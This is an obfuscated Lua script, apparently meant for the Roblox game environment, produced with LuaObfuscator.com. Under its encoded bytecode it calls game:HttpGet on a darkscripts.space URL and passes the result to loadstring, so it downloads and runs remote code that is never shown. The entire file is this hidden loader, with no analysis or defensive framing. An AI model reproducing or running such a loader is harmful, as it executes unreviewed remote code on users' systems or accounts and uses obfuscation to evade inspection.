--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v88=v2(v0(v30,16));if v19 then local v109=v5(v88,v19);v19=nil;return v109;else return v88;end end end);local function v20(v31,v32,v33) if v33 then local v89=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-1)) + (2 -1))) ;return v89-(v89%(620 -(555 + 11 + 53))) ;else local v90=(933 -(857 + 74))^(v32-(569 -((1244 -(282 + 595)) + 201))) ;return (((v31%(v90 + v90))>=v90) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35=0;local v36;local v37;while true do if (v35==(1638 -(1523 + 114))) then return (v37 * 256) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;v35=1271 -((984 -758) + 1044) ;end end end local function v23() local v38=(297 -(67 + 113)) -(32 + 85) ;local v39;local v40;local v41;local v42;while true do if (v38==(1 + 0 + 0)) then return (v42 * (3720433 + 13056783)) + (v41 * (66493 -(892 + 65))) + (v40 * (610 -354)) + v39 ;end if (v38==(0 -0)) then v39,v40,v41,v42=v1(v16,v18,v18 + (4 -1) );v18=v18 + 4 ;v38=351 -(87 + 263) ;end end end local function v24() local v43=v23();local v44=v23();local v45=1 -0 ;local v46=(v20(v44,(2 + 0) -1 ,20) * ((2 + 0)^(100 -68))) + v43 ;local v47=v20(v44,(142 -103) -(10 + 8) ,123 -92 );local v48=((v20(v44,984 -(802 + 150) )==(2 -1)) and  -(1 + 0)) or (1 -0) ;if (v47==0) then if (v46==(438 -(145 + 293))) then return v48 * (0 + (0 -0)) ;else local v110=(1856 -(814 + 45)) -(915 + 82) ;while true do if ((430 -((108 -64) + 386))==v110) then v47=2 -1 ;v45=0 + 0 ;break;end end end elseif (v47==(2691 -644)) then return ((v46==(1187 -(1069 + 118))) and (v48 * ((2 -1)/(772 -(201 + 571))))) or (v48 * NaN) ;end return v8(v48,v47-(2237 -1214) ) * (v45 + (v46/(2^(10 + 42)))) ;end local function v25(v49) local v50=0 + 0 ;local v51;local v52;while true do if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(1 + (0 -0)) );v18=v18 + v49 ;v50=887 -((1023 -762) + 624) ;end if (v50==(9 -6)) then return v6(v52);end if ((0 -0)==v50) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=1914 -(1789 + 2 + 122) ;end if (v50==(1082 -(1020 + 60))) then v52={};for v111=1424 -(630 + 623 + 170) , #v51 do v52[v111]=v2(v1(v3(v51,v111,v111)));end v50=3;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return function(v91,v92,v93,v94,v95,v96,v97,v98,v99) local v100=(function() return 0;end)();local v91=(function() return;end)();local v92=(function() return;end)();while true do if (v100==0) then local v119=(function() return 0 -0 ;end)();local v120=(function() return;end)();while true do if (v119==(0 + 0)) then v120=(function() return 0 -0 ;end)();while true do if (v120==(0 -0)) then v91=(function() return 867 -(550 + 317) ;end)();v92=(function() return nil;end)();v120=(function() return 1 -0 ;end)();end if (v120==1) then v100=(function() return 1;end)();break;end end break;end end end if (v100==(1 -0)) then local v121=(function() return 0 -0 ;end)();while true do if (v121==0) then local v122=(function() return 0;end)();while true do if (v122==0) then while true do if (v91~=(285 -(134 + 151))) then else v92=(function() return v93();end)();if (v94(v92, #":", #"<")~=(1665 -(970 + 695))) then else local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();local v177=(function() return;end)();local v178=(function() return;end)();while true do if (v175~=3) then else if (v94(v177, #"-19", #"-19")== #":") then v178[ #".dev"]=(function() return v97[v178[ #"xnxx"]];end)();end v98[v99]=(function() return v178;end)();break;end if (v175~=(1991 -(582 + 1408))) then else local v180=(function() return 0 -0 ;end)();while true do if (v180==(1 -0)) then v175=(function() return 2;end)();break;end if (v180~=(0 -0)) then else v178=(function() return {v95(),v95(),nil,nil};end)();if (v176==0) then local v184=(function() return 1824 -(1195 + 629) ;end)();local v185=(function() return;end)();while true do if (v184==0) then v185=(function() return 0;end)();while true do if (v185~=(0 -0)) then else v178[ #"xxx"]=(function() return v95();end)();v178[ #"http"]=(function() return v95();end)();break;end end break;end end elseif (v176== #"}") then v178[ #"xnx"]=(function() return v96();end)();elseif (v176==(243 -(187 + 54))) then v178[ #"asd"]=(function() return v96() -((782 -(162 + 618))^(12 + 4)) ;end)();elseif (v176~= #"xxx") then else local v190=(function() return 0 + 0 ;end)();local v191=(function() return;end)();while true do if (v190==(0 -0)) then v191=(function() return 0;end)();while true do if (v191~=0) then else v178[ #"nil"]=(function() return v96() -(2^16) ;end)();v178[ #"asd1"]=(function() return v95();end)();break;end end break;end end end v180=(function() return 1;end)();end end end if (v175==0) then v176=(function() return v94(v92,2, #"nil");end)();v177=(function() return v94(v92, #"0836",9 -3 );end)();v175=(function() return 1 + 0 ;end)();end if (v175==(1638 -(1373 + 263))) then if (v94(v177, #"~", #"]")~= #"~") then else v178[1002 -(451 + 549) ]=(function() return v97[v178[2]];end)();end if (v94(v177,2,1 + 1 )~= #"~") then else v178[ #"19("]=(function() return v97[v178[ #"nil"]];end)();end v175=(function() return 3;end)();end end end break;end end return v91,v92,v93,v94,v95,v96,v97,v98,v99;end end end end end end end;end)();local v54=(function() return function(v101,v102,v103) local v104=(function() return 0 -0 ;end)();local v105=(function() return;end)();while true do if ((0 -0)~=v104) then else v105=(function() return 0;end)();while true do if ((1384 -(746 + 638))~=v105) then else local v123=(function() return 0 + 0 ;end)();local v124=(function() return;end)();while true do if (v123~=0) then else v124=(function() return 0;end)();while true do if (v124==0) then v101[v102-#"[" ]=(function() return v103();end)();return v101,v102,v103;end end break;end end end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"}",v59 do local v69=(function() return 341 -(218 + 123) ;end)();local v70=(function() return;end)();local v71=(function() return;end)();while true do if (1==v69) then if (v70== #">") then v71=(function() return v21()~=(1581 -(1535 + 46)) ;end)();elseif (v70==(2 + 0)) then v71=(function() return v24();end)();elseif (v70~= #"91(") then else v71=(function() return v25();end)();end v60[v68]=(function() return v71;end)();break;end if (0==v69) then local v114=(function() return 0;end)();while true do if (v114==(1 + 0)) then v69=(function() return 1;end)();break;end if (v114~=(560 -(306 + 254))) then else v70=(function() return v21();end)();v71=(function() return nil;end)();v114=(function() return 1;end)();end end end end end v58[ #"91("]=(function() return v21();end)();for v72= #" ",v23() do FlatIdent_A36C,Descriptor,v21,v20,v22,v23,v60,v55,v72=(function() return v53(FlatIdent_A36C,Descriptor,v21,v20,v22,v23,v60,v55,v72);end)();end for v73= #"[",v23() do v56,v73,v28=(function() return v54(v56,v73,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[3 -1 ];local v67=v62[5 -2 ];return function(...) local v74=v65;local v75=v66;local v76=v67;local v77=v27;local v78=1468 -(899 + 81 + 487) ;local v79= -(1 + 0);local v80={};local v81={...};local v82=v12("#",...) -(3 -2) ;local v83={};local v84={};for v106=0 -0 ,v82 do if (v106>=v76) then v80[v106-v76 ]=v81[v106 + (604 -(268 + 335)) ];else v84[v106]=v81[v106 + (2 -1) ];end end local v85=(v82-v76) + (581 -(361 + 219)) ;local v86;local v87;while true do v86=v74[v78];v87=v86[(430 -139) -(60 + 230) ];if ((3286<=4935) and (v87<=(579 -(426 + 146)))) then if (v87<=(416 -(15 + 398))) then if ((788<=3423) and (v87<=(1 + 0))) then if ((v87>(1456 -(282 + 1174))) or (4007<741)) then local v125=811 -(569 + 242) ;local v126;local v127;while true do if (v125==(0 -0)) then v126=v86[1 + 1 ];v127=v84[v86[3]];v125=1025 -(706 + 318) ;end if (((1588 -(144 + 192)) -(721 + 530))==v125) then v84[v126 + 1 + 0 ]=v127;v84[v126]=v127[v86[1275 -(945 + 326) ]];break;end end else v84[v86[4 -2 ]]();end elseif ((v87==(2 + 0)) or (1155>2350)) then v84[v86[702 -(271 + 429) ]]=v64[v86[3 + (216 -(42 + 174)) ]];else do return;end end elseif (v87<=(1505 -(1408 + 70 + 22))) then if (v87>(1090 -(461 + 518 + 107))) then local v130=0 -0 ;local v131;while true do if (v130==(0 -0)) then v131=v86[1290 -(993 + 295) ];v84[v131]=v84[v131](v13(v84,v131 + 1 + 0 ,v79));break;end end else local v132=v86[1553 -(1126 + 181 + 244) ];local v133,v134=v77(v84[v132](v13(v84,v132 + (1172 -(418 + 753)) ,v86[408 -((1622 -(363 + 1141)) + 287) ])));v79=(v134 + v132) -(1 + (1580 -(1183 + 397))) ;local v135=0 + 0 ;for v153=v132,v79 do local v154=0 -0 ;while true do if (v154==(0 + 0)) then v135=v135 + (378 -(142 + 235)) ;v84[v153]=v133[v135];break;end end end end elseif ((4029<=4853) and (v87==(2 + (11 -7)))) then v84[v86[531 -(406 + 123) ]]=v86[(1299 + 473) -(1749 + 20) ]~=(977 -(553 + 424)) ;else local v137=v86[1 + 1 ];local v138,v139=v77(v84[v137](v13(v84,v137 + (1323 -(1249 + 73)) ,v86[3 + 0 ])));v79=(v139 + v137) -(1 + 0) ;local v140=0 + 0 + 0 ;for v155=v137,v79 do v140=v140 + (1146 -(466 + 679)) ;v84[v155]=v138[v140];end end elseif (v87<=(26 -15)) then if (v87<=(25 -16)) then if (v87>8) then v84[v86[1902 -(106 + 1794) ]]();else v84[v86[1 + 1 ]]=v64[v86[1 + 2 ]];end elseif (v87>(3 + 7)) then v84[v86[5 -(1978 -(1913 + 62)) ]]=v86[7 -4 ];else local v145=0;local v146;local v147;while true do if (v145==(1 + 0)) then v84[v146 + (1330 -(797 + 532)) ]=v147;v84[v146]=v147[v86[(75 + 43) -((10 -6) + 110) ]];break;end if (v145==(0 + 0)) then v146=v86[586 -(57 + 527) ];v147=v84[v86[1430 -(41 + 1386) ]];v145=1;end end end elseif ((v87<=(1215 -((2306 -(565 + 1368)) + 829))) or (516>3434)) then if (v87==(115 -(17 + (323 -237)))) then v84[v86[(1663 -(1477 + 184)) + 0 ]]=v86[3];else do return;end end elseif (v87==(30 -16)) then v84[v86[2]]=v86[8 -5 ]~=(166 -(122 + 44)) ;else local v151=0 -0 ;local v152;while true do if (v151==(0 -0)) then v152=v86[2];v84[v152]=v84[v152](v13(v84,v152 + (3 -2) ,v79));break;end end end v78=v78 + 1 + 0 + 0 ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403303Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F306539383435373339382E6C756100093Q0012023Q00013Q001202000100023Q00200100010001000300120B000300044Q000E000400014Q0007000100044Q000F5Q00022Q00093Q000100012Q00033Q00017Q00",v9(),...);
